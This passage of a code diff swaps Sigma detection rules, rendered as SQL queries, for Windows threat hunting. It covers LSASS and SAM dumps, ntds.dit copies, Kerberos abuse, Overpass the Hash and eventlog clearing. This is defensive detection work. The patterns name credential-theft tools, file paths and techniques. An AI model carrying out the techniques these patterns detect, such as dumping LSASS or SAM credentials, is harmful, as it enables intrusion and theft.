TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Runas command-line tool using /netonly parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.006" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "status": "experimental", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate add-ins" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "status": "test", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Very unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' 